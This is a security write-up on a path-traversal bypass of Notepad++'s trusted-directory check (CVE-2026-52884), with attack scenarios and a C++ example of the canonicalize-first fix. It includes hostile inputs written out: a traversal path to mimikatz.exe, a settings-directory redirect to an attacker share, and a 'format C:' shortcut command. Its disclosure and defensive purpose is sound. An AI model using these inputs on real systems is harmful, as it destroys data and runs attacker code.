Notepad++ v8.9.6.1 — the version that was supposed to fix the shortcuts.xml command injection — still lets attackers run arbitrary code without a single warning dialog. CVE-2026-52884 carries a CVSS 7.8 and bypasses the trusted-directory check added in the CVE-2026-48800 patch because the check never bothers to canonicalize the path first.
Why a Simple Prefix Check Fails
The new isInTrustedDirectory() function in RunDlg.cpp does exactly what you'd expect from a first-draft security fix: it checks whether the path starts with a trusted directory like C:\Windows\System32\. Microsoft's PathIsPrefix() or a naive StartsWith() returns true for C:\Windows\System32\..\..\Users\[USER]\Downloads\mimikatz.exe because the first 20 characters are indeed C:\Windows\System32\. The ..\..\ traversal components are never resolved before the prefix match.
Consequence: the resolved path points to an untrusted executable — but the check sees only the prefix. No warning, no confirmation, just silent execution.
Four Attack Scenarios You Should Worry About
Scenario 1 is the simplest: any process running under the same user can write to %APPDATA%\Notepad++\shortcuts.xml. Insert a command like C:\Windows\System32\..\..\Users\[USERNAME]\Downloads\mimikatz.exe and bind it to Alt+F1. Press the key — payload runs.
Scenario 2 is meaner: a malicious .lnk file can redirect Notepad++ to load a remote shortcuts.xml using -settingsDir=\\\attacker\share\config. The remote XML carries the path traversal bypass. The user thinks they're opening a text file; instead, they get code execution.
Scenario 3 exploits cloud sync (OneDrive, Dropbox). Compromise the cloud storage, inject the traversal into the user's synced shortcuts.xml, and wait for Notepad++ to reload.
Scenario 4 doesn't even need path traversal. cmd.exe and powershell.exe live in trusted directories. A shortcut command like cmd.exe /c format C: /fs:NTFS /q /y executes without a peep because the prefix check passes on C:\Windows\System32\cmd.exe.
The One-Line Fix
The advisory includes the correct fix: call PathCanonicalize() or GetFullPathNameW() on the input path before running the prefix check. Resolve .., ., and redundant separators first, then compare against the trusted directory list. That's it — one API call that would have prevented all four scenarios.
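To make the difference concrete, here is an added example (not Notepad++'s own code) that places the naive prefix check beside one that canonicalizes first. The lexical canonicalize() stands in for GetFullPathNameW()/PathCanonicalize(), which a Windows build would call instead, and the single trusted directory is an assumption for the demo.

```cpp
// Added illustration of the bypass and the fix; not code from RunDlg.cpp.
#include <cctype>
#include <string>
#include <vector>

// Windows paths are case-insensitive, so compare prefixes that way.
static bool iequals(const std::string& a, const std::string& b) {
    if (a.size() != b.size()) return false;
    for (size_t i = 0; i < a.size(); ++i)
        if (std::tolower((unsigned char)a[i]) != std::tolower((unsigned char)b[i])) return false;
    return true;
}

static bool hasPrefix(const std::string& s, const std::string& prefix) {
    return s.size() >= prefix.size() && iequals(s.substr(0, prefix.size()), prefix);
}

// Lexically resolve ".", ".." and redundant separators in a drive-letter path,
// e.g. "C:\Windows\System32\..\..\Users\u\x.exe" -> "C:\Users\u\x.exe".
// Stand-in for GetFullPathNameW(); a real build must use the OS API.
std::string canonicalize(const std::string& path) {
    std::vector<std::string> parts;
    std::string cur;
    auto flush = [&]() {
        if (cur.empty() || cur == ".") { /* drop empty and "." components */ }
        else if (cur == "..") { if (parts.size() > 1) parts.pop_back(); }  // never climb above "C:"
        else parts.push_back(cur);
        cur.clear();
    };
    for (char c : path) { if (c == '\\' || c == '/') flush(); else cur += c; }
    flush();
    std::string out;
    for (size_t i = 0; i < parts.size(); ++i) out += parts[i] + (i + 1 < parts.size() ? "\\" : "");
    return out;
}

// Assumed trusted directory for the demo; compared with a trailing separator so
// that "C:\Windows\System32Evil\..." does not match.
static const std::string kTrustedDir = "C:\\Windows\\System32\\";

// Vulnerable form: prefix match on the raw, unresolved string.
bool isInTrustedDirectoryNaive(const std::string& path) {
    return hasPrefix(path, kTrustedDir);
}

// Fixed form: resolve the path first, then do the same prefix match.
bool isInTrustedDirectoryFixed(const std::string& path) {
    return hasPrefix(canonicalize(path), kTrustedDir);
}
```

Note that the fixed check still returns true for C:\Windows\System32\cmd.exe, which is exactly the Scenario 4 caveat above: canonicalization closes the traversal bypass, not the interpreter problem.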
Donho, the maintainer, has patched this in v8.9.6.2. Anyone still on v8.9.6.1 should update immediately. The broader lesson: security patches that add a check without canonicalizing the input are not security patches — they're footnotes for the next CVE.
Source: Notepad++ Zero-Click RCE via Path Traversal (CVE-2026-52884)
Domain: github.com